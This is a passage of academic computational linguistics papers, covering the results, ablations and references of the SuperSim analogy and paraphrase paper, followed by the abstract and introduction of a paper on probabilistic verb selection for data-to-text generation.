model assigns a probability to each of the five choices and guesses the choice with the highest probability. SuperSim achieves a score of 54.8% correct (205 out of 374). Table 4 gives the rank of SuperSim in the list of the top ten results with the SAT analogy questions.6 The scores ranging from 51.1% to 57.0% are not sig- nificantly different from SuperSim’s score of 54.8%, according to Fisher’s exact test at the 95% confi- dence level. However, SuperSim answers the SAT questions in a few minutes, whereas LRA requires nine days, and SuperSim learns its models automat- ically, unlike the hand-coding of Turney (2012). 6See the State of the Art page on the ACL Wiki at http: //aclweb.org/aclwiki. 358 Algorithm Reference Correct Know-Best Veale (2004) 43.0 k-means Biçici & Yuret (2006) 44.0 BagPack Herdağdelen & Baroni (2009) 44.1 VSM Turney & Littman (2005) 47.1 Dual-Space Turney (2012) 51.1 BMI Bollegala et al. (2009) 51.1 PairClass Turney (2008b) 52.1 PERT Turney (2006a) 53.5 SuperSim — 54.8 LRA Turney (2006b) 56.1 Human Average college applicant 57.0 Table 4: The top ten results on five-choice SAT questions. 4.2 Ten-choice SAT Questions In addition to symmetries, proportional analogies have asymmetries. In general, if the quadruple 〈a, b, c, d〉 is positive, 〈a, d, c, b〉 is negative. For example, 〈word, language, note, music〉 is a good analogy, but 〈word, music, note, language〉 is not. Words are the basic units of language and notes are the basic units of music, but words are not necessary for music and notes are not necessary for language. Turney (2012) used this asymmetry to convert the 374 five-choice SAT questions into 374 ten- choice SAT questions. Each choice 〈c, d〉 was expanded with the stem 〈a, b〉, resulting in the quadruple 〈a, b, c, d〉, and then the order was shuf- fled to 〈a, d, c, b〉, so that each choice pair in a five- choice question generated two choice quadruples in a ten-choice question. Nine of the quadruples are negative examples and the quadruple consisting of the stem pair followed by the solution pair is the only positive example. The purpose of the ten-choice questions is to test the ability of measures of rela- tional similarity to avoid the asymmetric distractors. We use the ten-choice questions to compare the hand-coded dual-space approach (Turney, 2012) with SuperSim. We also use these questions to per- form an ablation study of the four sets of features in SuperSim. As with the five-choice questions, we use the symmetries of proportional analogies to add three more positive examples, so the training dataset has nine negative examples and four posi- tive examples per question. We apply ten-fold cross- validation to the 374 ten-choice questions. On the ten-choice questions, SuperSim’s score Features Algorithm LF PPMI Dom Fun Correct Dual-Space 0 0 1 1 47.9 SuperSim 1 1 1 1 52.7 SuperSim 0 1 1 1 52.7 SuperSim 1 0 1 1 52.7 SuperSim 1 1 0 1 45.7 SuperSim 1 1 1 0 41.7 SuperSim 1 0 0 0 5.6 SuperSim 0 1 0 0 32.4 SuperSim 0 0 1 0 39.6 SuperSim 0 0 0 1 39.3 Table 5: Feature ablation with ten-choice SAT questions. is 52.7% (Table 5), compared to 54.8% on the five-choice questions (Table 4), a drop of 2.1%. The hand-coded dual-space model scores 47.9% (Table 5), compared to 51.1% on the five-choice questions (Table 4), a drop of 3.2%. The dif- ference between SuperSim (52.7%) and the hand- coded dual-space model (47.9%) is not significant according to Fisher’s exact test at the 95% confi- dence level. The advantage of SuperSim is that it does not need hand-coding. The results show that SuperSim can avoid the asymmetric distractors. Table 5 shows the impact of different subsets of features on the percentage of correct answers to the ten-choice SAT questions. Included features are marked 1 and ablated features are marked 0. The results show that the log frequency (LF) and PPMI features are not helpful (but also not harmful) for relational similarity. We also see that domain space and function space are both needed for good results. 4.3 SemEval 2012 Task 2 The SemEval 2012 Task 2 dataset is based on the semantic relation classification scheme of Bejar et al. (1991), consisting of ten high-level categories of relations and seventy-nine subcategories, with paradigmatic examples of each subcategory. For instance, the subcategory taxonomic in the cate- gory class inclusion has three paradigmatic exam- ples, flower:tulip, emotion:rage, and poem:sonnet. Jurgens et al. (2012) used Amazon’s Mechanical Turk to create the SemEval 2012 Task 2 dataset in two phases. In the first phase, Turkers expanded the paradigmatic examples for each subcategory to an 359 Algorithm Reference Spearman BUAP Tovar et al. (2012) 0.014 Duluth-V2 Pedersen (2012) 0.038 Duluth-V1 Pedersen (2012) 0.039 Duluth-V0 Pedersen (2012) 0.050 UTD-SVM Rink & Harabagiu (2012) 0.116 UTD-NB Rink & Harabagiu (2012) 0.229 RNN-1600 Mikolov et al. (2013) 0.275 UTD-LDA Rink & Harabagiu (2013) 0.334 Com Zhila et al. (2013) 0.353 SuperSim — 0.408 Table 6: Spearman correlations for SemEval 2012 Task 2. average of forty-one word pairs per subcategory, a total of 3,218 pairs. In the second phase, each word pair from the first phase was assigned a prototypical- ity score, indicating its similarity to the paradigmatic examples. The challenge of SemEval 2012 Task 2 was to guess the prototypicality scores. SuperSim was trained on the five-choice SAT questions and evaluated on the SemEval 2012 Task 2 test dataset. For a given a word pair, we created quadruples, combining the word pair with each of the paradigmatic examples for its subcategory. We then used SuperSim to compute the probabilities for each quadruple. Our guess for the prototypicality score of the given word pair was the average of the probabilities. Spearman’s rank correlation coef- ficient between the Turkers’ prototypicality scores and SuperSim’s scores was 0.408, averaged over the sixty-nine subcategories in the testing set. Super- Sim has the highest Spearman correlation achieved to date on SemEval 2012 Task 2 (see Table 6). 5 Compositional Similarity This section presents experiments using SuperSim to learn compositional similarity. The datasets con- sist of triples, 〈a, b, c〉, such that ab is a noun- modifier bigram and c is a noun unigram. The triples are labeled as positive and negative exam- ples of paraphrases. Table 2 shows that the fea- ture vectors have 675 elements. We experiment with two datasets, seven-choice and fourteen-choice noun-modifier questions (Turney, 2012).7 7The seven-choice dataset is available at http://jair. org/papers/paper3640.html. The fourteen-choice dataset can be generated from the seven-choice dataset. Stem: fantasy world Choices: (1) fairyland (2) fantasy (3) world (4) phantasy (5) universe (6) ranter (7) souring Solution: (1) fairyland Table 7: A noun-modifier question based on WordNet. 5.1 Noun-Modifier Questions The first dataset is a seven-choice noun-modifier question dataset, constructed from WordNet (Tur- ney, 2012). The dataset contains 680 questions for training and 1,500 for testing, a total of 2,180 ques- tions. Table 7 shows one of the questions. The stem is a bigram and the choices are uni- grams. The bigram is composed of a head noun (world), modified by an adjective or noun (fantasy). The solution is the unigram (fairyland) that belongs to the same WordNet synset as the stem. The distractors are designed to be difficult for cur- rent approaches to composition. For example, if fan- tasy world is represented by element-wise multipli- cation of the context vectors for fantasy and world (Mitchell and Lapata, 2010), the most likely guess is fantasy or world, not fairyland (Turney, 2012). Each seven-choice question yields seven labeled triples, by combining the stem with each choice. The triple 〈fantasy, world, fairyland〉 is labeled pos- itive and the other six triples are labeled negative. In general, if 〈a, b, c〉 is a positive example, then 〈b, a, c〉 is negative. For example, world fantasy is not a paraphrase of fairyland. The second dataset is constructed by applying this shuffling transfor- mation to convert the 2,180 seven-choice questions into 2,180 fourteen-choice questions (Turney, 2012). The second dataset is designed to be difficult for approaches that are not sensitive to word order. Table 8 shows the percentage of the testing questions that are answered correctly for the two datasets. Because vector addition and element-wise multiplication are not sensitive to word order, they perform poorly on the fourteen-choice questions. For both datasets, SuperSim performs significantly 360 Correct Algorithm 7-choices 14-choices Vector addition 50.1 22.5 Element-wise multiplication 57.5 27.4 Dual-Space model 58.3 41.5 SuperSim 75.9 68.0 Holistic model 81.6 — Table 8: Results for the two noun-modifier datasets. better than all other approaches, except for the holis- tic approach, according to Fisher’s exact test at the 95% confidence level.8 The holistic approach is noncompositional. The stem bigram is represented by a single context vec- tor, generated by treating the bigram as if it were a unigram. A noncompositional approach cannot scale up to realistic applications (Turney, 2012). The holistic approach cannot be applied to the fourteen- choice questions, because the bigrams in these ques- tions do not correspond to terms in WordNet, and hence they do not correspond to row vectors in the matrices we use (see Section 3). Turney (2012) found it necessary to hand-code a soundness check into all of the algorithms (vector addition, element-wise multiplication, dual-space, and holistic). Given a stem ab and a choice c, the hand-coded check assigns a minimal score to the choice if c = a or c = b. We do not need to hand- code any checking into SuperSim. It learns automat- ically from the training data to avoid such choices. 5.2 Ablation Experiments Table 9 shows the effects of ablating sets of fea- tures on the performance of SuperSim with the fourteen-choice questions. PPMI features are the most important; by themselves, they achieve 59.7% correct, although the other features are needed to reach 68.0%. Domain space features reach the sec- ond highest performance when used alone (34.6%), but they reduce performance (from 69.3% to 68.0%) when combined with other features; however, the drop is not significant according to Fisher’s exact test at the 95% significance level. Since the PPMI features play an important role in answering the noun-modifier questions, let us take 8The results for SuperSim are new but the other results in Table 8 are from Turney (2012). Features Algorithm LF PPMI Dom Fun Correct Dual-Space 0 0 1 1 41.5 SuperSim 1 1 1 1 68.0 SuperSim 0 1 1 1 66.6 SuperSim 1 0 1 1 52.3 SuperSim 1 1 0 1 69.3 SuperSim 1 1 1 0 65.9 SuperSim 1 0 0 0 14.1 SuperSim 0 1 0 0 59.7 SuperSim 0 0 1 0 34.6 SuperSim 0 0 0 1 32.9 Table 9: Ablation with fourteen-choice questions. PPMI feature subsets 〈a, b〉〈a, c〉〈b, c〉 Correct 1 1 1 68.0 0 1 1 59.9 1 0 1 65.4 1 1 0 67.5 1 0 0 62.6 0 1 0 58.1 0 0 1 55.6 0 0 0 52.3 Table 10: PPMI subset ablation with fourteen-choices. a closer look at them. From Table 2, we see that there are twelve PPMI features for the triple 〈a, b, c〉, where ab is a noun-modifier bigram and c is a noun unigram. We can split the twelve features into three subsets, one subset for each pair of words, 〈a, b〉, 〈a, c〉, and 〈b, c〉. For example, the subset for 〈a, b〉 is the four features PPMI(a, b, left), PPMI(b, a, left), PPMI(a, b, right), and PPMI(b, a, right). Table 10 shows the effects of ablating these subsets. The results in Table 10 indicate that all three PPMI subsets contribute to the performance of SuperSim, but the 〈a, b〉 subset contributes more than the other two subsets. The 〈a, b〉 features help to increase the sensitivity of SuperSim to the order of the words in the noun-modifier bigram; for exam- ple, they make it easier to distinguish fantasy world from world fantasy. 5.3 Holistic Training SuperSim uses 680 training questions to learn to rec- ognize when a bigram is a paraphrase of a unigram; it learns from expert knowledge implicit in WordNet 361 Stem: search engine Choices: (1) search engine (2) search (3) engine (4) search language (5) search warrant (6) diesel engine (7) steam engine Solution: (1) search engine Table 11: A question based on holistic vectors. synsets. It would be advantageous to be able to train SuperSim with less reliance on expert knowledge. Past work with adjective-noun bigrams has shown that we can use holistic bigram vectors to train a supervised regression model (Guevara, 2010; Baroni and Zamparelli, 2010). The output of the regression model is a vector representation for a bigram that approximates the holistic vector for the bigram; that is, it approximates the vector we would get by treat- ing the bigram as if it were a unigram. SuperSim does not generate vectors as output, but we can still use holistic bigram vectors for training. Table 11 shows a seven-choice training question that was generated without using WordNet synsets. The choices of the form a b are bigrams, but we repre- sent them with holistic bigram vectors; we pretend they are unigrams. We call a b bigrams pseudo- unigrams. As far as SuperSim is concerned, there is no difference between these pseudo-unigrams and true unigrams. The question in Table 11 is treated the same as the question in Table 7. We generate 680 holistic training questions by randomly selecting 680 noun-modifier bigrams from WordNet as stems for the questions (search engine), avoiding any bigrams that appear as stems in the testing questions. The solution (search engine) is the pseudo-unigram that corresponds to the stem bigram. In the matrices in Section 3, each term in WordNet corresponds to a row vector. These corresponding row vectors enable us to treat bigrams from WordNet as if they were unigrams. The distractors are the component unigrams in the stem bigram (search and engine) and pseudo- unigrams that share a component word with the stem (search warrant, diesel engine). To construct the holistic training questions, we used WordNet as a Correct Training 7-choices 14-choices Holistic 61.8 54.4 Standard 75.9 68.0 Table 12: Results for SuperSim with holistic training. source of bigrams, but we ignored the rich infor- mation that WordNet provides about these bigrams, such as their synonyms, hypernyms, hyponyms, meronyms, and glosses. Table 12 compares holistic training to standard training (that is, training with questions like Table 11 versus training with questions like Table 7). The testing set is the standard testing set in both cases. There is a significant drop in performance with holistic training, but the performance still surpasses vector addition, element-wise multiplication, and the hand-coded dual-space model (see Table 8). Since holistic questions can be generated auto- matically without human expertise, we experi- mented with increasing the size of the holistic train- ing dataset, growing it from 1,000 to 10,000 ques- tions in increments of 1,000. The performance on the fourteen-choice questions with holistic train- ing and standard testing varied between 53.3% and 55.1% correct, with no clear trend up or down. This is not significantly different from the performance with 680 holistic training questions (54.4%). It seems likely that the drop in performance with holistic training instead of standard training is due to a difference in the nature of the standard questions (Table 7) and the holistic questions (Table 11). We are currently investigating this issue. We expect to be able to close the performance gap in future work, by improving the holistic questions. However, it is possible that there are fundamental limits to holistic training. 6 Discussion SuperSim performs slightly better (not statistically significant) than the hand-coded dual-space model on relational similarity problems (Section 4), but it performs much better on compositional similarity problems (Section 5). The ablation studies suggest this is due to the PPMI features, which have no effect on ten-choice SAT performance (Table 5), but have a 362 large effect on fourteen-choice noun-modifier para- phrase performance (Table 9). One advantage of supervised learning over hand- coding is that it facilitates adding new features. It is not clear how to modify the hand-coded equations for the dual-space model of noun-modifier composi- tion (Turney, 2012) to include PPMI information. SuperSim is one of the few approaches to distri- butional semantics beyond words that has attempted to address both relational and compositional similar- ity (see Section 2.3). It is a strength of this approach that it works well with both kinds of similarity. 7 Future Work and Limitations Given the promising results with holistic training for noun-modifier paraphrases, we plan to experiment with holistic training for analogies. Consider the proportional analogy hard is to hard time as good is to good time, where hard time and good time are pseudo-unigrams. To a human, this analogy is triv- ial, but SuperSim has no access to the surface form of a term. As far as SuperSim is concerned, this analogy is much the same as the analogy hard is to difficulty as good is to fun. This strategy automat- ically converts simple, easily generated analogies into more complex, challenging analogies, which may be suited to training SuperSim. This also suggests that noun-modifier paraphrases may be used to solve analogies. Perhaps we can evaluate the quality of a candidate analogy 〈a, b, c, d〉 by searching for a term e such that 〈b, e, a〉 and 〈d, e, c〉 are good paraphrases. For example, consider the analogy mason is to stone as carpenter is to wood. We can paraphrase mason as stone worker and carpenter as wood worker. This transforms the analogy to stone worker is to stone as wood worker is to wood, which makes it easier to recognize the relational similarity. Another area for future work is extending Super- Sim beyond noun-modifier paraphrases to measur- ing the similarity of sentence pairs. We plan to adapt ideas from Socher et al. (2011) for this task. They use dynamic pooling to represent sentences of vary- ing size with fixed-size feature vectors. Using fixed- size feature vectors avoids the problem of quadratic growth and it enables the supervised learner to gen- eralize over sentences of varying length. Some of the competing approaches discussed by Erk (2013) incorporate formal logic. The work of Baroni et al. (2012) suggests ways that SuperSim could be developed to deal with logic. We believe that SuperSim could benefit from more features, with greater diversity. One place to look for these features is higher levels in the hierar- chy that we sketch in Section 3. Our ablation experiments suggest that domain and function spaces provide the most important features for relational similarity, but PPMI values provide the most important features for noun-modifier composi- tional similarity. Explaining this is another topic for future research. 8 Conclusion In this paper, we have presented SuperSim, a unified approach to analogy (relational similarity) and para- phrase (compositional similarity). SuperSim treats them both as problems of supervised tuple classifi- cation. The supervised learning algorithm is a stan- dard support vector machine. The main contribution of SuperSim is a set of four types of features for rep- resenting tuples. The features work well with both analogy and paraphrase, with no task-specific mod- ifications. SuperSim matches the state of the art on SAT analogy questions and substantially advances the state of the art on the SemEval 2012 Task 2 chal- lenge and the noun-modifier paraphrase questions. SuperSim runs much faster than LRA (Turney, 2006b), answering the SAT questions in minutes instead of days. Unlike the dual-space model (Tur- ney, 2012), SuperSim requires no hand-coded simi- larity composition functions. Since there is no hand- coding, it is easy to add new features to SuperSim. Much work remains to be done, such as incorporat- ing logic and scaling up to sentence paraphrases, but past work suggests that these problems are tractable. In the four approaches described by Erk (2013), SuperSim is an instance of the second approach to extending distributional semantics beyond words, comparing word pairs, phrases, or sentences (in gen- eral, tuples) by combining multiple pairwise simi- larity values. Perhaps the main significance of this paper is that it provides some evidence in support of this general approach. 363 References Eneko Agirre, Daniel Cer, Mona Diab, and Aitor Gonzalez-Agirre. 2012. Semeval-2012 Task 6: A pilot on semantic textual similarity. In Proceedings of the First Joint Conference on Lexical and Compu- tational Semantics (*SEM), pages 385–393, Montréal, Canada. Ion Androutsopoulos and Prodromos Malakasiotis. 2010. A survey of paraphrasing and textual entailment methods. Journal of Artificial Intelligence Research, 38:135–187. Marco Baroni and Roberto Zamparelli. 2010. Nouns are vectors, adjectives are matrices: Representing adjective-noun constructions in semantic space. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing (EMNLP 2010), pages 1183–1193. Marco Baroni, Raffaella Bernardi, Ngoc-Quynh Do, and Chung-chieh Shan. 2012. Entailment above the word level in distributional semantics. In Proceedings of the 13th Conference of the European Chapter of the Asso- ciation for Computational Linguistics (EACL 2012), pages 23–32. Isaac I. Bejar, Roger Chaffin, and Susan E. Embretson. 1991. Cognitive and Psychometric Analysis of Ana- logical Problem Solving. Springer-Verlag. Ergun Biçici and Deniz Yuret. 2006. Clustering word pairs to answer analogy questions. In Proceedings of the Fifteenth Turkish Symposium on Artificial Intelli- gence and Neural Networks (TAINN 2006), Akyaka, Mugla, Turkey. Danushka Bollegala, Yutaka Matsuo, and Mitsuru Ishizuka. 2008. WWW sits the SAT: Measuring rela- tional similarity on the Web. In Proceedings of the 18th European Conference on Artificial Intelligence (ECAI 2008), pages 333–337, Patras, Greece. Danushka Bollegala, Yutaka Matsuo, and Mitsuru Ishizuka. 2009. Measuring the similarity between implicit semantic relations from the Web. In Proceed- ings of the 18th International Conference on World Wide Web (WWW 2009), pages 651–660. John Bullinaria and Joseph Levy. 2007. Extract- ing semantic representations from word co-occurrence statistics: A computational study. Behavior Research Methods, 39(3):510–526. John Bullinaria and Joseph Levy. 2012. Extract- ing semantic representations from word co-occurrence statistics: Stop-lists, stemming, and SVD. Behavior Research Methods, 44(3):890–907. John Caron. 2001. Experiments with LSA scor- ing: Optimal rank and basis. In Proceedings of the SIAM Computational Information Retrieval Work- shop, pages 157–169, Raleigh, NC. Kenneth Church and Patrick Hanks. 1989. Word asso- ciation norms, mutual information, and lexicography. In Proceedings of the 27th Annual Conference of the Association of Computational Linguistics, pages 76– 83, Vancouver, British Columbia. Daoud Clarke. 2012. A context-theoretic framework for compositionality in distributional semantics. Compu- tational Linguistics, 38(1):41–71. Katrin Erk. 2013. Towards a semantics for distributional representations. In Proceedings of the 10th Interna- tional Conference on Computational Semantics (IWCS 2013), Potsdam, Germany. John Rupert Firth. 1957. A synopsis of linguistic theory 1930–1955. In Studies in Linguistic Analysis, pages 1–32. Blackwell, Oxford. Dan Garrette, Katrin Erk, and Ray Mooney. 2011. Inte- grating logical representations with probabilistic infor- mation using markov logic. In Proceedings of the 9th International Conference on Computational Semantics (IWCS 2011), pages 105–114. Dedre Gentner. 1983. Structure-mapping: A theoretical framework for analogy. Cognitive Science, 7(2):155– 170. Roxana Girju, Preslav Nakov, Vivi Nastase, Stan Szpakowicz, Peter Turney, and Deniz Yuret. 2007. Semeval-2007 task 04: Classification of semantic relations between nominals. In Proceedings of the Fourth International Workshop on Semantic Evalua- tions (SemEval 2007), pages 13–18, Prague, Czech Republic. Emiliano Guevara. 2010. A regression model of adjective-noun compositionality in distributional semantics. In Proceedings of the 2010 Workshop on GEometrical Models of Natural Language Semantics (GEMS 2010), pages 33–37. Zellig Harris. 1954. Distributional structure. Word, 10(23):146–162. Iris Hendrickx, Su Nam Kim, Zornitsa Kozareva, Preslav Nakov, Diarmuid Ó Séaghdha, Sebastian Padó, Marco Pennacchiotti, Lorenza Romano, and Stan Szpakow- icz. 2010. Semeval-2010 task 8: Multi-way classifica- tion of semantic relations between pairs of nominals. In Proceedings of the 5th International Workshop on Semantic Evaluation, pages 33–38, Uppsala, Sweden. Amaç Herdağdelen and Marco Baroni. 2009. Bagpack: A general framework to represent semantic relations. In Proceedings of the EACL 2009 Geometrical Models for Natural Language Semantics (GEMS) Workshop, pages 33–40. Nathalie Japkowicz and Shaju Stephen. 2002. The class imbalance problem: A systematic study. Intelligent Data Analysis, 6(5):429–449. David A. Jurgens, Saif M. Mohammad, Peter D. Tur- ney, and Keith J. Holyoak. 2012. SemEval-2012 364 Task 2: Measuring degrees of relational similarity. In Proceedings of the First Joint Conference on Lexi- cal and Computational Semantics (*SEM), pages 356– 364, Montréal, Canada. Thomas K. Landauer and Susan T. Dumais. 1997. A solution to Plato’s problem: The latent seman- tic analysis theory of the acquisition, induction, and representation of knowledge. Psychological Review, 104(2):211–240. Benoı̂t Lemaire and Guy Denhière. 2006. Effects of high-order co-occurrences on word semantic similar- ity. Current Psychology Letters: Behaviour, Brain & Cognition, 18(1). Yves Lepage and Ando Shin-ichi. 1996. Saussurian analogy: A theoretical account and its application. In Proceedings of the 16th International Conference on Computational Linguistics (COLING 1996), pages 717–722. Kevin Lund, Curt Burgess, and Ruth Ann Atchley. 1995. Semantic and associative priming in high-dimensional semantic space. In Proceedings of the 17th Annual Conference of the Cognitive Science Society, pages 660–665. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013. Linguistic regularities in continuous space word representations. In Proceedings of the 2013 Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies (NAACL 2013), Atlanta, Georgia. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In Proceedings of ACL-08: HLT, pages 236–244, Columbus, Ohio. Association for Computational Linguistics. Jeff Mitchell and Mirella Lapata. 2010. Composition in distributional models of semantics. Cognitive Science, 34(8):1388–1429. Ted Pedersen. 2012. Duluth: Measuring degrees of relational similarity with the gloss vector measure of semantic relatedness. In First Joint Conference on Lexical and Computational Semantics (*SEM), pages 497–501, Montreal, Canada. John C. Platt. 1998. Fast training of support vector machines using sequential minimal optimization. In Advances in Kernel Methods: Support Vector Learn- ing, pages 185–208, Cambridge, MA. MIT Press. Bryan Rink and Sanda Harabagiu. 2012. UTD: Deter- mining relational similarity using lexical patterns. In First Joint Conference on Lexical and Computational Semantics (*SEM), pages 413–418, Montreal, Canada. Bryan Rink and Sanda Harabagiu. 2013. The impact of selectional preference agreement on semantic rela- tional similarity. In Proceedings of the 10th Interna- tional Conference on Computational Semantics (IWCS 2013), Potsdam, Germany. Richard Socher, Eric H. Huang, Jeffrey Pennington, Andrew Y. Ng, and Christopher D. Manning. 2011. Dynamic pooling and unfolding recursive autoen- coders for paraphrase detection. In Advances in Neural Information Processing Systems (NIPS 2011), pages 801–809. Richard Socher, Brody Huval, Christopher Manning, and Andrew Ng. 2012. Semantic compositionality through recursive matrix-vector spaces. In Proceed- ings of the 2012 Joint Conference on Empirical Meth- ods in Natural Language Processing and Computa- tional Natural Language Learning (EMNLP-CoNLL 2012), pages 1201–1211. Mireya Tovar, J. Alejandro Reyes, Azucena Montes, Darnes Vilariño, David Pinto, and Saul León. 2012. BUAP: A first approximation to relational similar- ity measuring. In First Joint Conference on Lexi- cal and Computational Semantics (*SEM), pages 502– 505, Montreal, Canada. Peter D. Turney and Michael L. Littman. 2005. Corpus- based learning of analogies and semantic relations. Machine Learning, 60(1–3):251–278. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37:141– 188. Peter D. Turney, Michael L. Littman, Jeffrey Bigham, and Victor Shnayder. 2003. Combining independent mod- ules to solve multiple-choice synonym and analogy problems. In Proceedings of the International Con- ference on Recent Advances in Natural Language Pro- cessing (RANLP-03), pages 482–489, Borovets, Bul- garia. Peter D. Turney, Yair Neuman, Dan Assaf, and Yohai Cohen. 2011. Literal and metaphorical sense identifi- cation through concrete and abstract context. In Pro- ceedings of the 2011 Conference on Empirical Meth- ods in Natural Language Processing, pages 680–690. Peter D. Turney. 2006a. Expressing implicit semantic relations without supervision. In Proceedings of the 21st International Conference on Computational Lin- guistics and 44th Annual Meeting of the Association for Computational Linguistics (Coling/ACL-06), pages 313–320, Sydney, Australia. Peter D. Turney. 2006b. Similarity of semantic relations. Computational Linguistics, 32(3):379–416. Peter D. Turney. 2008a. The latent relation mapping engine: Algorithm and experiments. Journal of Artifi- cial Intelligence Research, 33:615–655. Peter D. Turney. 2008b. A uniform approach to analo- gies, synonyms, antonyms, and associations. In Pro- ceedings of the 22nd International Conference on Computational Linguistics (Coling 2008), pages 905– 912, Manchester, UK. 365 Peter D. Turney. 2012. Domain and function: A dual- space model of semantic relations and compositions. Journal of Artificial Intelligence Research, 44:533– 585. Tony Veale. 2004. WordNet sits the SAT: A knowledge- based approach to lexical analogy. In Proceedings of the 16th European Conference on Artificial Intel- ligence (ECAI 2004), pages 606–612, Valencia, Spain. Ian H. Witten, Eibe Frank, and Mark A. Hall. 2011. Data Mining: Practical Machine Learning Tools and Tech- niques, Third Edition. Morgan Kaufmann, San Fran- cisco. Alisa Zhila, Wen-tau Yih, Christopher Meek, Geoffrey Zweig, and Tomas Mikolov. 2013. Combining het- erogeneous models for measuring relational similar- ity. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies (NAACL 2013), Atlanta, Georgia. 366 work_y4fwwb63b5a77gm3wpynicxd4q ---- Probabilistic Verb Selection for Data-to-Text Generation Dell Zhang†1, Jiahao Yuan‡, Xiaoling Wang‡2, and Adam Foster† †Birkbeck, University of London, Malet Street, London WC1E 7HX, UK ‡Shanghai Key Lab of Trustworthy Computing, East China Normal University, 3663 North Zhongshan Road, Shanghai 200062, China 1dell.z@ieee.org, 2xlwang@sei.ecnu.edu.cn Abstract In data-to-text Natural Language Generation (NLG) systems, computers need to find the right words to describe phenomena seen in the data. This paper focuses on the problem of choosing appropriate verbs to express the di- rection and magnitude of a percentage change (e.g., in stock prices). Rather than simply using the same verbs again and again, we present a principled data-driven approach to this prob- lem based on Shannon’s noisy-channel model so as to bring variation and naturalness into the generated text. Our experiments on three large-scale real-world news corpora demon- strate that the proposed probabilistic model can be learned to accurately imitate human authors’ pattern of usage around verbs, outperforming the state-of-the-art method significantly. 1 Introduction Natural Language Generation (NLG) is a fundamen- tal task in Artificial Intelligence (AI) (Russell and Norvig, 2009). It aims to automatically turn struc- tured data into prose (Reiter, 2007; Belz and Kow, 2009) — the opposite of the better-known field of Natural Language Processing (NLP) that transforms raw text into structured data (e.g., a logical form or a knowledge base) (Jurafsky and Martin, 2009). Being dubbed “algorithmic authors” or “robot journalists”, NLG systems have attracted a lot of attention in re- cent years, thanks to the rise of big data (Wright, 2015). The use of NLG in financial services has been growing very fast. One particularly important NLG problem for summarizing financial or business data is to automatically generate textual descriptions of trends between two data points (such as stock prices). In this paper, we elect to use relative percentages rather than absolute numbers to describe the change from one data point to another. This is because an absolute number might be considered small in one case but large in another, depending on the unit and the context (Krifka, 2007; Smiley et al., 2016). For example, 1000 British pounds are worth much more than 1000 Japanese yen; a rise of 100 US dollars in car price might be negligible but the same amount of increase in bike price would be significant. Given two data points (e.g., on a stock chart), the percentage change can always be calculated easily. The challenge is to select the appropriate verb for any percentage change. For example, in newspa- pers, we often see headlines like “Apple’s stock had jumped 34% this year in anticipation of the next iPhone . . . ” and “Microsoft’s profit climbed 28% with shift to Web-based software . . . ”. The journal- ists writing such news stories use descriptive lan- guage such as the verbs like jump and climb to express the direction and magnitude of a percent- age change. It is of course possible to simply keep using the same neutral verbs, e.g., increase and decrease for upward and downward changes re- spectively, again and again, as in most existing data- to-text NLG systems. However, the generated text would sound much more natural if computers could use a variety of verbs suitable in the context like human authors do. Expressions of percentage changes are readily available in many natural language text datasets and 511 Transactions of the Association for Computational Linguistics, vol. 6, pp. 511–527, 2018. Action Editor: Alexander Koller. Submission batch: 1/2018; Revision batch: 5/2018; Published 8/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. can be easily extracted. Therefore computers should be able to learn from such expressions how people de- cide which verbs to use for what kind of percentage changes. In this paper, we address the problem of verb se- lection for data-to-text NLG through a principled data-driven approach. Specifically, we show how to employ Bayesian reasoning to train a probabilistic model for verb selection based on large-scale real- world news corpora, and demonstrate its advantages over existing verb selection methods. The rest of this paper is organized as follows. In Section 2, we review the related work in literature. In Section 3, we describe the dataset used for our inves- tigation. In Section 4, we present our probabilistic model for verb selection in detail. In Section 5, we conduct experimental evaluation. In Section 6, we discuss possible extensions to the proposed approach. In Section 7, we draw conclusions. 2 Related Work The most successful NLG applications, from the com- mercial perspective, have been data-to-text NLG sys- tems which generate textual descriptions of databases or datasets (Reiter, 2007; Belz and Kow, 2009). A typical example is the automatic generation of tex- tual weather forecasts from weather data that has been used by Environment Canada and UK Met Of- fice (Goldberg et al., 1994; Belz, 2008; Sripada et al., 2014). The TREND system (Boyd, 1998) focuses on generating descriptions of historical weather patterns. Their method concentrates primarily on the detection of upward and downward trends in the weather data, and uses a limited set of verbs to describe different types of movements. Ramos-Soto et al. (2013) also address the surface realization of weather trend data by creating an “intermediate language” for temper- ature, wind etc. and then using four different ways to verbalize temperatures based on the minimum, maximum and trend in the time frame considered. An empirical corpus-based study of human-written weather forecasts has been conducted in SUMTIME- MOUSAM (Reiter et al., 2005), and one aspect of their research focused on verb selection in weather forecasts. They built a classifier to predict the choice of verb based on type (speed vs. direction), informa- tion content (change or transition from one wind state to another) and near-synonym choice. There is more and more interest in using NLG to enhance acces- sibility, for example by describing data in the form of graphs etc. to visually impaired people. In such NLG systems, there has also been exploration into the generation of text for trend data which should be au- tomatically adapted to users’ reading levels (Moraes et al., 2014). There exists wide-spread usage of NLG systems on the financial and business data. For ex- ample, the SPOTLIGHT system developed at A.C. Nielsen automatically generated readable English text based on the analysis of large amounts of retail sales data. For another example, in 2016 Forbes re- ported that FactSet used NLG to automatically write hundreds of thousands of company descriptions a day. It is not difficult to imagine that different kinds of such data-to-text NLG systems can be utilized by a modern chatbot like Amazon Echo or Microsoft XiaoIce (Shum et al., 2018) to enable users access a variety of online data resources via natural language conversation. Typically, a complete data-to-text NLG system im- plements a pipeline which involves both content se- lection (“what to say”) and surface realization (“how to say”). In recent years, researchers have made much progress in the end-to-end joint optimization of those two aspects: Angeli et al. (2010) treat the generation process as a sequence of local decisions represented by log-linear models; Konstas and Lapata (2013) employ a probabilistic context-free grammar (PCFG) specifying the structure of the event records and complement it with an n-gram language model as well as a dependency model; the most advanced method to date is the LSTM recurrent neural net- work (RNN) based encoder-aligner-decoder model proposed by Mei et al. (2016) which is able to learn content selection and surface realization together di- rectly from database-text pairs. The verb selection problem that we focus on in this paper belongs to the lexicalization step of content selection, more specifi- cally, sentence planning. Similar to the above men- tioned joint optimization methods, our approach to verb selection is also automatic, unsupervised, and domain-independent. It would be straightforward to generalize our proposed model to select other types of words 